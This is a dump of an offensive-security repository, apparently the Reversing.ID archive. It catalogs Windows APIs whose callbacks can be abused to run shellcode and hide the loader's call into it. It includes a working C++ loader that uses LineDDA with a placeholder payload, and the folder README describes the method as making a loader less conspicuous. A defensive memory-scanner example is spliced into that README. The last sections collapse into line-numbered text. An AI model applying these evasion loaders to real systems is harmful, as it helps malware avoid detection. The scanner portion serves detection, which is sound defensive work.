- [MSDN GrayStringA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-graystringa)
- [MSDN GrayStringW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-graystringw)

--------------------------------------------------------------------------------
/windows/execution/callback/ImageGetDigestStream/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `ImageGetDigestStream`.

```c++
BOOL IMAGEAPI ImageGetDigestStream (HANDLE FileHandle, DWORD DigestLevel, DIGEST_FUNCTION DigestFunction, DIGEST_HANDLE DigestHandle);
```

### Reference

- [MSDN ImageGetDigestStream](https://docs.microsoft.com/en-us/windows/win32/api/imagehlp/nf-imagehlp-imagegetdigeststream)

--------------------------------------------------------------------------------
/windows/execution/callback/ImmEnumInputContext/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `ImmEnumInputContext`.

```c++
BOOL ImmEnumInputContext (DWORD idThread, IMCENUMPROC lpfn, LPARAM lParam);
```

### Reference

- [MSDN ImmEnumInputContext](https://docs.microsoft.com/en-us/windows/win32/api/imm/nf-imm-immenuminputcontext)

--------------------------------------------------------------------------------
/windows/execution/callback/InitOnceExecuteOnce/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `InitOnceExecuteOnce`.

```c++
BOOL InitOnceExecuteOnce (PINIT_ONCE InitOnce, PINIT_ONCE_FN InitFn, PVOID Parameter, LPVOID *Context);
```

### Reference

- [MSDN InitOnceExecuteOnce](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-initonceexecuteonce)

--------------------------------------------------------------------------------
/windows/execution/callback/LdrEnumerateLoadedModules/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `LdrEnumerateLoadedModules`.

`LdrEnumerateLoadedModules` is an internal, low-level ntdll function; the prototype below is not an official declaration.

```c++
NTSTATUS LdrEnumerateLoadedModules (BOOL ReservedFlag, LDR_ENUM_CALLBACK EnumProc, PVOID context);
```

### Reference

--------------------------------------------------------------------------------
/windows/execution/callback/LdrpCallInitRoutine/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `LdrpCallInitRoutine`.

`LdrpCallInitRoutine` is an internal, low-level ntdll routine; the prototype below is not an official declaration.

```c++
char LdrpCallInitRoutine (LpCallInitRoutine callback, size_t, unsigned int, size_t);
```

### Reference

--------------------------------------------------------------------------------
/windows/execution/callback/LineDDA/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `LineDDA`.

```c++
BOOL LineDDA(int xStart, int yStart, int xEnd, int yEnd, LINEDDAPROC lpProc, LPARAM data);
```

### Reference

- [MSDN LineDDA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-linedda)

--------------------------------------------------------------------------------
/windows/execution/callback/LineDDA/c++/code.cpp:
--------------------------------------------------------------------------------

/*
    Shellcode Loader
    Archive of Reversing.ID

    Abusing Windows API to run shellcode as callback.

    Compile:
        $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

    Technique:
        - allocation: VirtualAlloc
        - writing: RtlMoveMemory
        - permission: VirtualProtect
        - execution: LineDDA
*/

#include <windows.h>
#include <stdint.h>

#pragma comment(lib,"gdi32")

int main ()
{
    void * runtime;
    BOOL   retval;
    DWORD  old_protect = 0;

    // shellcode storage in stack (placeholder payload: nop; nop; int3; ret)
    uint8_t  payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = 4;

    // allocate memory buffer for payload as READ-WRITE (no executable)
    runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (runtime == NULL)
        return 1;

    // copy payload to the buffer
    RtlMoveMemory (runtime, payload, payload_len);

    // make buffer executable (R-X)
    retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect);
    if (retval != 0)
    {
        // LineDDA calls the LINEDDAPROC once for every point on the line from
        // (10,11) to (12,13), endpoint excluded, so the payload runs more than
        // once and must tolerate being re-entered
        LineDDA (10, 11, 12, 13, (LINEDDAPROC)runtime, 0);
    }

    // deallocate the space (MEM_RELEASE requires dwSize == 0)
    VirtualFree (runtime, 0, MEM_RELEASE);

    return 0;
}

--------------------------------------------------------------------------------
/windows/execution/callback/MappingRecognizeText/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `MappingRecognizeText`. The callback is supplied through the `pfnRecognizeCallback` member of the `MAPPING_OPTIONS` structure passed in `pOptions`; the service handle comes from `MappingGetServices` and is released with `MappingFreeServices`.

```c++
HRESULT MappingRecognizeText (PMAPPING_SERVICE_INFO pServiceInfo, LPCWSTR pszText, DWORD dwLength, DWORD dwIndex, PMAPPING_OPTIONS pOptions, PMAPPING_PROPERTY_BAG pbag);

HRESULT MappingGetServices (PMAPPING_ENUM_OPTIONS pOptions, PMAPPING_SERVICE_INFO *prgServices, DWORD *pdwServicesCount);

HRESULT MappingFreeServices (PMAPPING_SERVICE_INFO pServiceInfo);
```

### Reference

- [MSDN MappingRecognizeText](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappingrecognizetext)
- [MSDN MappingGetServices](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappinggetservices)
- [MSDN MappingFreeServices](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappingfreeservices)
- [MSDN structure MAPPING_OPTIONS](https://docs.microsoft.com/en-us/windows/win32/api/elscore/ns-elscore-mapping_options)

--------------------------------------------------------------------------------
/windows/execution/callback/NotifyIpInterfaceChange/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `NotifyIpInterfaceChange`.

This function is available on Windows Vista and later.

```c++
IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API
NotifyIpInterfaceChange (ADDRESS_FAMILY Family, PIPINTERFACE_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle);
```

### Reference

- [MSDN NotifyIpInterfaceChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyipinterfacechange)

--------------------------------------------------------------------------------
/windows/execution/callback/NotifyRouteChange2/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `NotifyRouteChange2`.

```c++
IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API
NotifyRouteChange2 (ADDRESS_FAMILY AddressFamily, PIPFORWARD_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle);
```

### Reference

- [MSDN NotifyRouteChange2](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyroutechange2)

--------------------------------------------------------------------------------
/windows/execution/callback/NotifyTeredoPortChange/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `NotifyTeredoPortChange`.

```c++
IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API
NotifyTeredoPortChange (PTEREDO_PORT_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle);
```

### Reference

- [MSDN NotifyTeredoPortChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyteredoportchange)

--------------------------------------------------------------------------------
/windows/execution/callback/NotifyUnicastIpAddressChange/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `NotifyUnicastIpAddressChange`.

```c++
IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API
NotifyUnicastIpAddressChange (ADDRESS_FAMILY Family, PUNICAST_IPADDRESS_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle);
```

### Reference

- [MSDN NotifyUnicastIpAddressChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyunicastipaddresschange)

--------------------------------------------------------------------------------
/windows/execution/callback/PageSetupDlg/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `PageSetupDlg`. The callback is the `lpfnPageSetupHook` member of the `PAGESETUPDLG` structure and is honoured only when `Flags` includes `PSD_ENABLEPAGESETUPHOOK` (`lpfnPagePaintHook` with `PSD_ENABLEPAGEPAINTHOOK` is the alternative).

```c++
BOOL PageSetupDlg (LPPAGESETUPDLG lppsd);
```

### Reference

- [MSDN PageSetupDlg](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646937(v=vs.85))
- [MSDN structure PAGESETUPDLGA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-pagesetupdlga)
- [MSDN structure PAGESETUPDLGW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-pagesetupdlgw)

--------------------------------------------------------------------------------
/windows/execution/callback/PlaExtractCabinet/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `PlaExtractCabinet`.

```c++
HRESULT PlaExtractCabinet (PCWSTR CabFileName, PCWSTR DestPath, PLA_CABEXTRACT_CALLBACK Callback, PVOID Context);
```

### Reference

- [github pla.h](https://github.com/nihon-tc/Rtest/blob/master/header/Microsoft%20SDKs/Windows/v7.0A/Include/pla.h)

--------------------------------------------------------------------------------
/windows/execution/callback/PrintDlg/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `PrintDlg`. The callback is the `lpfnPrintHook` member of the `PRINTDLG` structure and is honoured only when `Flags` includes `PD_ENABLEPRINTHOOK` (`lpfnSetupHook` with `PD_ENABLESETUPHOOK` is the alternative).

```c++
BOOL PrintDlg (LPPRINTDLG lppd);
```

### Reference

- [MSDN PrintDlg](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646940(v=vs.85))
- [MSDN structure PRINTDLGA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-printdlga)
- [MSDN structure PRINTDLGW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-printdlgW)

--------------------------------------------------------------------------------
/windows/execution/callback/PropertySheet/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `PropertySheet`. The callback is the `pfnCallback` member of the `PROPSHEETHEADER` structure and is honoured only when `dwFlags` includes `PSH_USECALLBACK`.

```c++
INT_PTR PropertySheetA (LPCPROPSHEETHEADERA header);

INT_PTR PropertySheetW (LPCPROPSHEETHEADERW header);
```

### Reference

- [MSDN PropertySheetA](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-propertysheeta)
- [MSDN PropertySheetW](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-propertysheetw)
- [MSDN structure PROPSHEETHEADER](https://docs.microsoft.com/en-us/windows/win32/controls/pss-propsheetheader)

--------------------------------------------------------------------------------
/windows/execution/callback/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

### Overview

Abusing Windows APIs to execute shellcode as a callback.

Some Windows APIs accept a callback that they invoke to handle each enumerated object or to process the result of an operation. Running shellcode as that callback makes the loader less conspicuous, because the transfer of control into the shellcode is implicit: the loader never calls the buffer itself, the API does. The buffer still has to be allocated, written and made executable beforehand, so the allocation and permission-change steps are the same as in a direct-call loader.

In most cases the callback runs on the same thread that called the Windows API, before that call returns. The exceptions are the asynchronous variants: completion routines (`ReadFileEx`, `WriteFileEx`) are queued as APCs and run only when the calling thread enters an alertable wait, and thread-pool callbacks run on a worker thread.
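The README above points out what the callback hides: the call into the shellcode. What it cannot hide is the memory, because every loader in this directory ends with a committed, executable region that no PE image backs, and that is what a memory scanner keys on. The following C program is an added example and not part of the Reversing.ID archive. It runs that check over a constructed snapshot laid out like `MEMORY_BASIC_INFORMATION` records (on Windows the records would come from looping `VirtualQueryEx` over the target's address space); the region list, the verdict names and the helper functions are this example's own, and the `MEM_*`/`PAGE_*` values are the ones from winnt.h, reproduced so the program builds without the Windows SDK.

```c
/*
 * Added example (not part of the Reversing.ID archive): a memory-scanner style
 * check for the loaders in this directory. Whichever API delivers the callback,
 * the payload ends up in a committed, executable region that no PE image backs.
 * Region records are a constructed snapshot in the shape of
 * MEMORY_BASIC_INFORMATION; on Windows they would come from VirtualQueryEx.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constants from winnt.h, reproduced so this builds without the Windows SDK. */
#define MEM_COMMIT              0x00001000u
#define MEM_RESERVE             0x00002000u
#define MEM_FREE                0x00010000u
#define MEM_PRIVATE             0x00020000u
#define MEM_MAPPED              0x00040000u
#define MEM_IMAGE               0x01000000u
#define PAGE_READONLY           0x02u
#define PAGE_READWRITE          0x04u
#define PAGE_EXECUTE            0x10u
#define PAGE_EXECUTE_READ       0x20u
#define PAGE_EXECUTE_READWRITE  0x40u
#define PAGE_EXECUTE_WRITECOPY  0x80u
#define PAGE_GUARD              0x100u
#define PAGE_ANY_EXECUTE (PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)

typedef struct {
    uint64_t base;     /* BaseAddress */
    uint64_t size;     /* RegionSize  */
    uint32_t state;    /* MEM_COMMIT / MEM_RESERVE / MEM_FREE */
    uint32_t type;     /* MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE */
    uint32_t protect;  /* current PAGE_* protection */
} region_t;

/* Verdict bits (names belong to this example, not to Windows). */
enum { REGION_OK = 0, REGION_PRIVATE_EXEC = 1, REGION_MAPPED_EXEC = 2, REGION_RWX = 4 };

/* Classify one region: executable code is expected only inside mapped PE images. */
int classify_region(const region_t *r)
{
    int v = REGION_OK;
    if (r->state != MEM_COMMIT || (r->protect & PAGE_ANY_EXECUTE) == 0)
        return REGION_OK;                 /* nothing runnable here */
    if (r->type == MEM_IMAGE)
        return REGION_OK;                 /* .text of a loaded EXE/DLL */
    if (r->type == MEM_PRIVATE)
        v |= REGION_PRIVATE_EXEC;         /* VirtualAlloc/HeapAlloc-style loader */
    else if (r->type == MEM_MAPPED)
        v |= REGION_MAPPED_EXEC;          /* section/file-mapping-style loader */
    if (r->protect & (PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY))
        v |= REGION_RWX;                  /* writable and executable at once */
    return v;
}

/* Convenience wrapper: classify an ad-hoc (state, type, protect) triple. */
int classify_values(uint32_t state, uint32_t type, uint32_t protect)
{
    region_t r = { 0, 0x1000, state, type, protect };
    return classify_region(&r);
}

/* Number of regions in a snapshot that get any verdict other than REGION_OK. */
size_t count_suspicious(const region_t *regions, size_t count)
{
    size_t n = 0;
    for (size_t i = 0; i < count; i++)
        if (classify_region(&regions[i]) != REGION_OK)
            n++;
    return n;
}

/* Walk a snapshot; store indices of flagged regions, return how many were stored. */
size_t scan_regions(const region_t *regions, size_t count, size_t *hits, size_t max_hits)
{
    size_t n = 0;
    for (size_t i = 0; i < count && n < max_hits; i++)
        if (classify_region(&regions[i]) != REGION_OK)
            hits[n++] = i;
    return n;
}

/* Constructed snapshot of a 64-bit process right after one of the loaders above
 * ran: the 4-byte payload sits in a single private page flipped RW -> RX. */
static const region_t sample_snapshot[] = {
    { 0x00007FF600000000ull, 0x1000,  MEM_COMMIT,  MEM_IMAGE,   PAGE_READONLY },               /* EXE headers */
    { 0x00007FF600001000ull, 0x9000,  MEM_COMMIT,  MEM_IMAGE,   PAGE_EXECUTE_READ },           /* EXE .text */
    { 0x00007FFA10001000ull, 0xB0000, MEM_COMMIT,  MEM_IMAGE,   PAGE_EXECUTE_READ },           /* kernel32 .text */
    { 0x000001D2A0000000ull, 0x10000, MEM_COMMIT,  MEM_PRIVATE, PAGE_READWRITE },              /* process heap */
    { 0x000000E000010000ull, 0x1000,  MEM_COMMIT,  MEM_PRIVATE, PAGE_READWRITE | PAGE_GUARD }, /* stack guard page */
    { 0x000001D2A0500000ull, 0x1000,  MEM_COMMIT,  MEM_PRIVATE, PAGE_EXECUTE_READ },           /* the shellcode page */
    { 0x000001D2A0600000ull, 0x1000,  MEM_RESERVE, MEM_PRIVATE, 0 },                           /* reserved, not committed */
    { 0x000001D2B0000000ull, 0x20000, MEM_COMMIT,  MEM_MAPPED,  PAGE_READONLY },               /* mapped data file */
};
#define SAMPLE_COUNT (sizeof sample_snapshot / sizeof sample_snapshot[0])

int main(void)
{
    size_t hits[SAMPLE_COUNT];
    size_t n = scan_regions(sample_snapshot, SAMPLE_COUNT, hits, SAMPLE_COUNT);
    for (size_t i = 0; i < n; i++) {
        const region_t *r = &sample_snapshot[hits[i]];
        printf("suspicious region base=0x%016llx size=0x%llx verdict=%d\n",
               (unsigned long long)r->base, (unsigned long long)r->size, classify_region(r));
    }
    return 0;
}
```

Private or section-backed executable memory is an indicator, not proof: JIT runtimes (.NET, JavaScript engines) allocate it legitimately, so a scanner pairs this verdict with other evidence (a thread or callback return address inside the region, the bytes at its start) before alerting. The check also does not depend on which API delivered the callback, which is why the callback indirection used throughout this directory buys nothing against it.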
--------------------------------------------------------------------------------
/windows/execution/callback/ReadFileEx/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `ReadFileEx`. The file handle must have been opened with `FILE_FLAG_OVERLAPPED`, and the completion routine is delivered as an APC, so it runs only once the calling thread enters an alertable wait (for example `SleepEx` or `WaitForSingleObjectEx` with `bAlertable` set to TRUE).

```c++
BOOL ReadFileEx (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPOVERLAPPED lpOverlapped, LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);

HANDLE CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);

HANDLE CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
```

### Reference

- [MSDN ReadFileEx](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfileex)
- [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea)
- [MSDN CreateFileW](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew)

--------------------------------------------------------------------------------
/windows/execution/callback/SHBrowseForFolder/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `SHBrowseForFolder`. The callback is the `lpfn` member (a `BFFCALLBACK`) of the `BROWSEINFO` structure; the dialog invokes it as it initialises and as the selection changes.

```c++
PIDLIST_ABSOLUTE SHBrowseForFolderA (LPBROWSEINFOA lpbi);

PIDLIST_ABSOLUTE SHBrowseForFolderW (LPBROWSEINFOW lpbi);
```

### Reference

- [MSDN SHBrowseForFolderA](https://docs.microsoft.com/en-us/windows/win32/api/shlobj_core/nf-shlobj_core-shbrowseforfoldera)
- [MSDN SHBrowseForFolderW](https://docs.microsoft.com/en-us/windows/win32/api/shlobj_core/nf-shlobj_core-shbrowseforfolderw)

--------------------------------------------------------------------------------
/windows/execution/callback/SendMessageCallback/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `SendMessageCallback`. The function sends a message to a window and invokes the callback once the window procedure has processed it. If the target window belongs to the calling thread, the window procedure and then the callback run synchronously; if it belongs to another thread, the callback is delivered only while the calling thread processes messages, so the loader triggers it by running a message loop itself.

```c++
BOOL SendMessageCallbackA (HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam, SENDASYNCPROC lpResultCallBack, ULONG_PTR dwData);

BOOL SendMessageCallbackW (HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam, SENDASYNCPROC lpResultCallBack, ULONG_PTR dwData);
```

### Reference

- [MSDN SendMessageCallbackA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-sendmessagecallbacka)
- [MSDN SendMessageCallbackW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-sendmessagecallbackw)

--------------------------------------------------------------------------------
/windows/execution/callback/SetWinEventHook/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `SetWinEventHook`. For an out-of-context hook (`WINEVENT_OUTOFCONTEXT`) the event is delivered through the calling thread's message queue, so the loader must run a message loop (`GetMessage`, `TranslateMessage`, `DispatchMessage`) for the callback to fire.

```c++
HWINEVENTHOOK SetWinEventHook (DWORD eventMin, DWORD eventMax, HMODULE hmodWinEventProc, WINEVENTPROC pfnWinEventProc, DWORD idProcess, DWORD idThread, DWORD dwFlags);
```

### Reference

- [MSDN SetWinEventHook](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwineventhook)
- [MSDN GetMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getmessage)
- [MSDN TranslateMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-translatemessage)
- [MSDN DispatchMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dispatchmessage)

--------------------------------------------------------------------------------
/windows/execution/callback/SymEnumProcesses/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `SymEnumProcesses`. `SymInitialize` is listed because dbghelp requires it before any other `Sym*` call.

```c++
BOOL IMAGEAPI SymEnumProcesses (PSYM_ENUMPROCESSES_CALLBACK EnumProcessesCallback, PVOID UserContext);

BOOL IMAGEAPI SymInitialize (HANDLE hProcess, PCSTR UserSearchPath, BOOL fInvadeProcess);
```

### Reference

- [MSDN SymEnumProcesses](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symenumprocesses)
- [MSDN SymInitialize](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-syminitialize)

--------------------------------------------------------------------------------
/windows/execution/callback/SymFindFileInPath/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `SymFindFileInPath`.

```c++
BOOL IMAGEAPI SymFindFileInPath (HANDLE hprocess, PCSTR SearchPath, PCSTR FileName, PVOID id, DWORD two, DWORD three, DWORD flags, PSTR FoundFile, PFINDFILEINPATHCALLBACK callback, PVOID context);

BOOL IMAGEAPI SymSrvGetFileIndexInfo (PCSTR File, PSYMSRV_INDEX_INFO Info, DWORD Flags);
```

### Reference

- [MSDN SymFindFileInPath](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symfindfileinpath)
- [MSDN SymSrvGetFileIndexInfo](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symsrvgetfileindexinfo)

--------------------------------------------------------------------------------
/windows/execution/callback/VerifierEnumerateResource/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `VerifierEnumerateResource`.

```c++
ULONG VerifierEnumerateResource (HANDLE Process, ULONG Flags, ULONG ResourceType, AVRF_RESOURCE_ENUMERATE_CALLBACK ResourceCallback, PVOID EnumerationContext);
```

### Reference

- [MSDN VerifierEnumerateResource](https://docs.microsoft.com/en-us/windows/win32/api/avrfsdk/nf-avrfsdk-verifierenumerateresource)

--------------------------------------------------------------------------------
/windows/execution/callback/WriteFileEx/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `WriteFileEx`. As with `ReadFileEx`, the handle must have been opened with `FILE_FLAG_OVERLAPPED` and the completion routine runs as an APC, so the calling thread has to enter an alertable wait for the shellcode to execute.

```c++
BOOL WriteFileEx (HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPOVERLAPPED lpOverlapped, LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);

HANDLE CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);

HANDLE CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
```

### Reference

- [MSDN WriteFileEx](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefileex)
- [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea)
- [MSDN CreateFileW](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew)

--------------------------------------------------------------------------------
/windows/execution/callback/WsPullBytes/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `WsPullBytes`.

```c++
HRESULT WsPullBytes (WS_XML_WRITER *writer, WS_PULL_BYTES_CALLBACK callback, void *callbackState, WS_ERROR *error);

HRESULT WsCreateWriter (const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_XML_WRITER **writer, WS_ERROR *error);

HRESULT WsSetOutput (WS_XML_WRITER *writer, const WS_XML_WRITER_ENCODING *encoding, const WS_XML_WRITER_OUTPUT *output, const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_ERROR *error);
```

### Reference

- [MSDN WsPullBytes](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wspullbytes)
- [MSDN WsCreateWriter](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wscreatewriter)
- [MSDN WsSetOutput](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wssetoutput)

--------------------------------------------------------------------------------
/windows/execution/callback/WsPushBytes/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `WsPushBytes`.

```c++
HRESULT WsPushBytes (WS_XML_WRITER *writer, WS_PUSH_BYTES_CALLBACK callback, void *callbackState, WS_ERROR *error);

HRESULT WsCreateWriter (const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_XML_WRITER **writer, WS_ERROR *error);

HRESULT WsSetOutput (WS_XML_WRITER *writer, const WS_XML_WRITER_ENCODING *encoding, const WS_XML_WRITER_OUTPUT *output, const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_ERROR *error);
```

### Reference

- [MSDN WsPushBytes](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wspushbytes)
- [MSDN WsCreateWriter](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wscreatewriter)
- [MSDN WsSetOutput](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wssetoutput)

--------------------------------------------------------------------------------
/windows/execution/callback/acmDriverEnum/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `acmDriverEnum`.

```c++
MMRESULT ACMAPI acmDriverEnum (ACMDRIVERENUMCB fnCallback, DWORD_PTR dwInstance, DWORD fdwEnum);
```

### Reference

- [MSDN acmDriverEnum](https://learn.microsoft.com/en-us/windows/win32/api/msacm/nf-msacm-acmdriverenum)

--------------------------------------------------------------------------------
/windows/execution/callback/mciSetYieldProc/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `mciSetYieldProc`.

The shellcode is invoked periodically, as the yield procedure, while an MCI command issued to the device with the `MCI_WAIT` flag is waiting to complete.
10 | 11 | ```c++ 12 | UINT mciSetYieldProc (MCIDEVICEID IDDevice, YIELDPROC yp, DWORD dwYieldData); 13 | 14 | MCIERROR mciSendCommand (MCIDEVICEID IDDevice, UINT uMsg, DWORD_PTR fdwCommand, DWORD_PTR dwParam); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN mciSetYieldProc](https://docs.microsoft.com/en-us/previous-versions/dd757163(v=vs.85)) 20 | - [MSDN mciSendCommand](https://docs.microsoft.com/en-us/previous-versions//dd757160(v=vs.85)) -------------------------------------------------------------------------------- /windows/execution/callback/mmioInstallIOProc/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `mmioInstallIOProc`. 8 | 9 | ```c++ 10 | LPMMIOPROC mmioInstallIOProc (FOURCC fccIOProc, LPMMIOPROC pIOProc, DWORD dwFlags); 11 | 12 | MCIERROR mciSendString (LPCTSTR lpszCommand, LPTSTR lpszReturnString, UINT cchReturn, HANDLE hwndCallback); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN mmioInstallIOProc](https://docs.microsoft.com/en-us/windows/win32/api/mmiscapi/nf-mmiscapi-mmioinstallioproc) 